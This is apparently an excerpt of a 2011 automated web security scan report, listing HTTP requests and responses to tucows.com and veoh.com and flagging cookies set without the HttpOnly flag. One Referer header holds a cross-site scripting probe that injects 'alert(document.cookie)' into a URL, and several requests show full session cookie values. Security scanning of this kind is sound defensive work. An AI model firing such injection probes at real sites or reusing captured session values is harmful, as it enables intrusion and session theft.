Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/javascript:void(null) HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/lostpass.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/privacy.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/safesearchtoggle.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/search.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:46 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/sitemap.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/terms.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/newassets/warningcow200.png HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 20:50:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32690
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /index.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:26:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 84555
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Free Software and Sh ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /preview/194850/x22 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /privacy.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 37121
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tucows Download</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sitemap.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 284258
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tucows Download</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /software.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:27:01 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 49878
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Download Windows Fre ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /terms.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:27:26 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 38411
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tucows Download</tit ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
veohCookie="VisitorUID=C5282E33-9CD2-D729-6A94-BEC4BD8BA173&LastUpdate=03/Feb/2011:12:30:38 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:38 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Set-Cookie: veohCookie="VisitorUID=C5282E33-9CD2-D729-6A94-BEC4BD8BA173&LastUpdate=03/Feb/2011:12:30:38 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:38 GMT; Path=/ Date: Thu, 03 Feb 2011 20:30:39 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=18 Content-Length: 134607
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
veohCookie="VisitorUID=426B478F-39D1-44FA-72ED-6DB69361922A&LastUpdate=03/Feb/2011:12:30:36 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:36 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
